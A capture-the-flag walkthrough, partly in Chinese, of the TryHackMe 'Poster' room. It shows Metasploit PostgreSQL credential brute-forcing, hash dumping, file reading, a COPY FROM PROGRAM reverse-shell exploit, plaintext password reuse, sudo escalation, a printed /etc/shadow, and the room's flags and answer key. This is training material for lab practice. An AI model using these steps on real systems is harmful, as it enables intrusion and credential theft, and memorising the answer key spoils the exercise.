Poster
The sys admin set up a rdbms in a safe way.
tag: rdbms, sql, enumeration, metasploit
Task 1: Flag
What is rdbms?
Depending on the EF Codd relational model, an RDBMS allows users to build, update, manage, and interact with a relational database, which stores data as a table.
Today, several companies use relational databases instead of flat files or hierarchical databases to store business data. This is because a relational database can handle a wide range of data formats and process queries efficiently. In addition, it organizes data into tables that can be linked internally based on common data. This allows the user to easily retrieve one or more tables with a single query. On the other hand, a flat file stores data in a single table structure, making it less efficient and consuming more space and memory.
Most commercially available RDBMSs currently use Structured Query Language (SQL) to access the database. RDBMS structures are most commonly used to perform CRUD operations (create, read, update, and delete), which are critical to support consistent data management.
Target IP Address : 10.10.205.125
Kali Linux : 10.18.72.222
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Downloads]
└─# nmap 10.10.205.125
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 22:45 EDT
Nmap scan report for 10.10.205.125
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5432/tcp open postgresql
Nmap done: 1 IP address (1 host up) scanned in 26.28 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kali)-[~/Downloads]
└─# nmap -sCV -p 22,80,5432 10.10.205.125
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 22:50 EDT
Nmap scan report for 10.10.205.125
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ 256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Poster CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
5432/tcp open postgresql PostgreSQL DB 9.5.8 - 9.5.10 or 9.5.17 - 9.5.23
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after: 2030-07-27T00:54:25
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.65 seconds
访问:http://10.10.205.125/
Name: PostgreSQL Login Utility
Module: auxiliary/scanner/postgres/postgres_login
List of CVEs: CVE-1999-0502
This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.
名称:PostgreSQL 登录实用程序
模块:auxiliary/scanner/postgres/postgres_login
CVE 列表:CVE-1999-0502
此模块尝试使用由 USER_FILE、PASS_FILE 和 USERPASS_FILE 选项指示的用户名和密码组合对 PostgreSQL 实例进行身份验证。请注意,密码可以是明文或 MD5 格式的哈希值。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(root㉿kali)-[~/Downloads]
└─# msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use auxiliary/scanner/postgres/postgres_login
msf6 auxiliary(scanner/postgres/postgres_login) > show options
Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user,
user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordli no File containing passwords, one per line
sts/postgres_default_pass.txt
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
s/using-metasploit.html
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordli no File containing (space-separated) users and passwords, one pair per line
sts/postgres_default_userpass.txt
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordli no File containing users, one per line
sts/postgres_default_user.txt
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/postgres/postgres_login) > setg RHOSTS 10.10.205.125
RHOSTS => 10.10.205.125
msf6 auxiliary(scanner/postgres/postgres_login) > set VERBOSE false
VERBOSE => false
msf6 auxiliary(scanner/postgres/postgres_login) > run
[+] 10.10.205.125:5432 - Login Successful: postgres:password@template1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
发现有效的登录凭据:postgres:password
PostgreSQL Server Generic Query
PostgreSQL Server Generic Query
This module will allow for simple SQL statements to be executed against a PostgreSQL instance given the appropriate credentials.
PostgreSQL 服务器通用查询
该模块允许使用适当的凭据对 PostgreSQL 实例执行简单的 SQL 语句。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf6 auxiliary(scanner/postgres/postgres_login) > use auxiliary/admin/postgres/postgres_sql
msf6 auxiliary(admin/postgres/postgres_sql) > show options
Module options (auxiliary/admin/postgres/postgres_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS 10.10.205.125 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port
SQL select version() no The SQL query to execute
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/postgres/postgres_sql) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/postgres/postgres_sql) > run
[*] Running module against 10.10.205.125
Query Text: 'select version()'
==============================
version
-------
PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] Auxiliary module execution completed
Postgres Password Hashdump
This module extracts the usernames and encrypted password hashes from a Postgres server and stores them for later cracking.
Postgres 密码哈希转储
该模块从 Postgres 服务器中提取用户名和加密密码哈希,并将它们存储以备后续破解之用。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
msf6 auxiliary(admin/postgres/postgres_sql) > use auxiliary/scanner/postgres/postgres_hashdump
msf6 auxiliary(scanner/postgres/postgres_hashdump) > show options
Module options (auxiliary/scanner/postgres/postgres_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 10.10.205.125 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME postgres yes The username to authenticate as
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/postgres/postgres_hashdump) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/postgres/postgres_hashdump) > run
[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================
Username Hash
-------- ----
darkstart md58842b99375db43e9fdf238753623a27d
poster md578fb805c7412ae597b399844a54cce0a
postgres md532e12f215ba27cb750c9e093ce4b5127
sistemas md5f7dbc0d5a06653e74da6b1af9290ee2b
ti md57af9ac4c593e9e4f275576e13f935579
tryhackme md503aab1165001c8f8ccae31a8824efddc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
postgres_readfile
The postgres_readfile module, when provided with valid credentials for a PostgreSQL server, will read and display files of your choosing on the server.
postgres_readfile 模块,在为 PostgreSQL 服务器提供有效凭据时,将读取并显示您在服务器上选择的文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
msf6 auxiliary(scanner/postgres/postgres_hashdump) > use auxiliary/admin/postgres/postgres_readfile
msf6 auxiliary(admin/postgres/postgres_readfile) > show options
Module options (auxiliary/admin/postgres/postgres_readfile):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RFILE /etc/passwd yes The remote file
RHOSTS 10.10.205.125 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/postgres/postgres_readfile) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/postgres/postgres_readfile) > run
[*] Running module against 10.10.205.125
Query Text: 'CREATE TEMP TABLE lsZDgg (INPUT TEXT);
COPY lsZDgg FROM '/etc/passwd';
SELECT * FROM lsZDgg'
=====================================================================================================================
input
-----
#/home/dark/credentials.txt
_apt:x:105:65534::/nonexistent:/bin/false
alison:x:1000:1000:Poster,,,:/home/alison:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
dark:x:1001:1001::/home/dark:
games:x:5:60:games:/usr/games:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
messagebus:x:106:110::/var/run/dbus:/bin/false
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
postgres:x:109:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
sys:x:3:3:sys:/dev:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
uuidd:x:107:111::/run/uuidd:/bin/false
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
#/home/dark/credentials.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
alison:x:1000:1000:Poster,,,:/home/alison:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:109:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
dark:x:1001:1001::/home/dark:
[+] 10.10.205.125:5432 Postgres - /etc/passwd saved in /root/.msf4/loot/20230813235707_default_10.10.205.125_postgres.file_263247.txt
[*] Auxiliary module execution completed
目标上的用户有:root、alison、dark。
PostgreSQL COPY FROM PROGRAM Command Execution
PostgreSQL COPY FROM PROGRAM Command Execution
Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with ‘pg_execute_server_program’ to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access. This module attempts to create a new table, then execute system commands in the context of copying the command output into the table. This module should work on all Postgres systems running version 9.3 and above. For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl For Windows Systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp Alternativly target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload or other customised command.
PostgreSQL COPY FROM PROGRAM 命令执行
安装运行 Postgres 9.3 及以上版本的系统具有功能,允许超级用户和具有 ‘pg_execute_server_program’ 权限的用户通过 COPY 命令与外部程序进行输入输出。这使得可以任意执行命令,就好像您有控制台访问权限一样。此模块尝试创建一个新表,然后在将命令输出复制到表中的上下文中执行系统命令。此模块应该适用于所有运行版本为 9.3 及以上的 Postgres 系统。对于 Linux 和 OSX 系统,使用目标 1 以及像 cmd/unix/reverse_perl 这样的 cmd 载荷。对于 Windows 系统,使用目标 2 以及像 cmd/windows/powershell_reverse_tcp 这样的 powershell 载荷。或者,目标 3 可以用于执行通用命令,比如 web_delivery meterpreter powershell 载荷或其他自定义命令。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
msf6 auxiliary(admin/postgres/postgres_readfile) > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options
Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
DUMP_TABLE_OUTPUT false no select payload command output from table (For Debugging)
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 10.10.205.125 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port (TCP)
TABLENAME fNUOAAmXC yes A table name that does not exist (To avoid deletion)
USERNAME postgres yes The username to authenticate as
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set PASSWORD password
PASSWORD => password
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 10.18.72.222:4444
[*] 10.10.205.125:5432 - 10.10.205.125:5432 - PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] 10.10.205.125:5432 - Exploiting...
[+] 10.10.205.125:5432 - 10.10.205.125:5432 - fNUOAAmXC dropped successfully
[+] 10.10.205.125:5432 - 10.10.205.125:5432 - fNUOAAmXC created successfully
[+] 10.10.205.125:5432 - 10.10.205.125:5432 - fNUOAAmXC copied successfully(valid syntax/command)
[+] 10.10.205.125:5432 - 10.10.205.125:5432 - fNUOAAmXC dropped successfully(Cleaned)
[*] 10.10.205.125:5432 - Exploit Succeeded
[*] Command shell session 1 opened (10.18.72.222:4444 -> 10.10.205.125:48962) at 2023-08-14 00:11:21 -0400
python3 -c 'import pty; pty.spawn("/bin/bash")'
postgres@ubuntu:/var/lib/postgresql/9.5/main$ whoami
whoami
postgres
postgres@ubuntu:/var/lib/postgresql/9.5/main$ id
id
uid=109(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert)
postgres@ubuntu:/var/lib/postgresql/9.5/main$ cd /home
cd /home
postgres@ubuntu:/home$ ls -al
ls -al
total 16
drwxr-xr-x 4 root root 4096 Jul 28 2020 .
drwxr-xr-x 22 root root 4096 Jul 28 2020 ..
drwxr-xr-x 4 alison alison 4096 Jul 28 2020 alison
drwxr-xr-x 2 dark dark 4096 Jul 28 2020 dark
postgres@ubuntu:/home$ cd alison
cd alison
postgres@ubuntu:/home/alison$ ls -al
ls -al
total 40
drwxr-xr-x 4 alison alison 4096 Jul 28 2020 .
drwxr-xr-x 4 root root 4096 Jul 28 2020 ..
-rw------- 1 alison alison 2444 Jul 28 2020 .bash_history
-rw-r--r-- 1 alison alison 220 Jul 28 2020 .bash_logout
-rw-r--r-- 1 alison alison 3771 Jul 28 2020 .bashrc
drwx------ 2 alison alison 4096 Jul 28 2020 .cache
drwxr-xr-x 2 alison alison 4096 Jul 28 2020 .nano
-rw-r--r-- 1 alison alison 655 Jul 28 2020 .profile
-rw-r--r-- 1 alison alison 0 Jul 28 2020 .sudo_as_admin_successful
-rw------- 1 alison alison 35 Jul 28 2020 user.txt
-rw-r--r-- 1 root root 183 Jul 28 2020 .wget-hsts
postgres@ubuntu:/home/alison$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
postgres@ubuntu:/home/alison$ cd ../dark
cd ../dark
postgres@ubuntu:/home/dark$ ls -al
ls -al
total 28
drwxr-xr-x 2 dark dark 4096 Jul 28 2020 .
drwxr-xr-x 4 root root 4096 Jul 28 2020 ..
-rw------- 1 dark dark 26 Jul 28 2020 .bash_history
-rw-r--r-- 1 dark dark 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 dark dark 3771 Aug 31 2015 .bashrc
-rwxrwxrwx 1 dark dark 24 Jul 28 2020 credentials.txt
-rw-r--r-- 1 dark dark 655 May 16 2017 .profile
postgres@ubuntu:/home/dark$ cat credentials.txt
cat credentials.txt
dark:qwerty1234#!hackme
发现用户凭据:dark:qwerty1234#!hackme
重启了一下Lab:
Target IP Address : 10.10.111.29
Kali Linux : 10.18.72.222
以dark用户身份ssh登录目标主机
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kali)-[~/Downloads]
└─# ssh dark@10.10.111.29
The authenticity of host '10.10.111.29 (10.10.111.29)' can't be established.
ED25519 key fingerprint is SHA256:8bd9QsiWgYCCiNEifxZv+F0jblZZnuBhOKgM6saFGCE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.111.29' (ED25519) to the list of known hosts.
dark@10.10.111.29's password:
Last login: Tue Jul 28 20:27:25 2020 from 192.168.85.142
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
dark@ubuntu:~$ whoami
dark
dark@ubuntu:~$ id
uid=1001(dark) gid=1001(dark) groups=1001(dark)
dark@ubuntu:~$ pwd
/home/dark
dark@ubuntu:~$ ls -al
total 28
drwxr-xr-x 2 dark dark 4096 Jul 28 2020 .
drwxr-xr-x 4 root root 4096 Jul 28 2020 ..
-rw------- 1 dark dark 26 Jul 28 2020 .bash_history
-rw-r--r-- 1 dark dark 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 dark dark 3771 Aug 31 2015 .bashrc
-rw-r--r-- 1 dark dark 655 May 16 2017 .profile
-rwxrwxrwx 1 dark dark 24 Jul 28 2020 credentials.txt
上传LinEnum.sh并执行:
1
2
3
[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(alison) gid=1000(alison) groups=1000(alison),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
1
2
[+] It looks like we have password hashes in /etc/passwd!
#/home/dark/credentials.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
[-] Kernel information:
Linux ubuntu 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.4.0-186-generic (buildd@lcy01-amd64-002) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.6 LTS"
NAME="Ubuntu"
VERSION="16.04.6 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.6 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
[-] Hostname:
ubuntu
还记得目标运行着Web服务吗?在/var/www/html目录下发现了config.php。
1
2
3
4
5
6
dark@ubuntu:/var/www/html$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Jul 28 2020 .
drwxr-xr-x 3 root root 4096 Jul 28 2020 ..
-rwxrwxrwx 1 alison alison 123 Jul 28 2020 config.php
drwxr-xr-x 4 alison alison 4096 Jul 28 2020 poster
在该文件中发现用户alison的密码为:p4ssw0rdS3cur3!#
1
2
3
4
5
6
7
8
dark@ubuntu:/var/www/html$ cat config.php
<?php
$dbhost = "127.0.0.1";
$dbuname = "alison";
$dbpass = "p4ssw0rdS3cur3!#";
$dbname = "mysudopassword";
?>
切换到alison用户。该用户在sudo组内。
1
2
3
4
5
6
dark@ubuntu:/var/www/html$ su - alison
Password:
alison@ubuntu:~$ whoami
alison
alison@ubuntu:~$ id
uid=1000(alison) gid=1000(alison) groups=1000(alison),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
alison@ubuntu:~$ pwd
/home/alison
alison@ubuntu:~$ ls -al
total 40
drwxr-xr-x 4 alison alison 4096 Jul 28 2020 .
drwxr-xr-x 4 root root 4096 Jul 28 2020 ..
-rw------- 1 alison alison 2444 Jul 28 2020 .bash_history
-rw-r--r-- 1 alison alison 220 Jul 28 2020 .bash_logout
-rw-r--r-- 1 alison alison 3771 Jul 28 2020 .bashrc
drwx------ 2 alison alison 4096 Jul 28 2020 .cache
drwxr-xr-x 2 alison alison 4096 Jul 28 2020 .nano
-rw-r--r-- 1 alison alison 655 Jul 28 2020 .profile
-rw-r--r-- 1 alison alison 0 Jul 28 2020 .sudo_as_admin_successful
-rw------- 1 alison alison 35 Jul 28 2020 user.txt
-rw-r--r-- 1 root root 183 Jul 28 2020 .wget-hsts
alison@ubuntu:~$ cat user.txt
THM{postgresql_fa1l_conf1gurat1on}
su
切换用户
sudo
超级用户执行
如果该二进制文件被sudo允许以超级用户身份运行,它不会降低提升的权限,可能被用于访问文件系统,升级或维持特权访问。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
alison@ubuntu:~$ sudo su
[sudo] password for alison:
root@ubuntu:/home/alison# whoami
root
root@ubuntu:/home/alison# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/alison# cat /etc/shadow
root:!:18471:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18471:0:99999:7:::
uuidd:*:18471:0:99999:7:::
alison:$6$w0kXFSdk$UbokwwU0oMyAD6Ar12b5zLfXb1yTDJAUtdAIL7XmnQaRXCvO9dqic6oG5TdVDoGxaL6XjM6uxldZ1MmPI1LIh0:18472:0:99999:7:::
sshd:*:18471:0:99999:7:::
postgres:*:18472:0:99999:7:::
dark:$6$kaUxujtE$PsmWfi8X.4YCFygPwjDgzLwqxZX4OCEF4nWoG4o4LsLyvDsWiSnUvQCKqhjNqiKQiZ4wgNewvM/zgbjahb2ci1:18472:0:99999:7:::
1
2
3
4
5
6
7
8
9
10
11
root@ubuntu:/home/alison# cd /root/
root@ubuntu:~# ls -al
total 24
drwx------ 3 root root 4096 Jul 28 2020 .
drwxr-xr-x 22 root root 4096 Jul 28 2020 ..
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4096 Jul 28 2020 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 49 Jul 28 2020 root.txt
root@ubuntu:~# cat root.txt
THM{c0ngrats_for_read_the_f1le_w1th_credent1als}
Answer the questions below
What is the rdbms installed on the server?
PostgreSQL
What port is the rdbms running on?
5432
Metasploit contains a variety of modules that can be used to enumerate in multiple rdbms, making it easy to gather valuable information.
After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?
auxiliary/scanner/postgres/postgres_login
What are the credentials you found?
example: user:password
postgres:password
What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?
auxiliary/admin/postgres/postgres_sql
Based on the results of #6, what is the rdbms version installed on the server?
9.5.21
What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?
auxiliary/scanner/postgres/postgres_hashdump
How many user hashes does the module dump?
6
What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
auxiliary/admin/postgres/postgres_readfile
What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?
exploit/multi/postgres/postgres_copy_from_program_cmd_exec
Compromise the machine and locate user.txt
THM{postgresql_fa1l_conf1gurat1on}
Escalate privileges and obtain root.txt
THM{c0ngrats_for_read_the_f1le_w1th_credent1als}
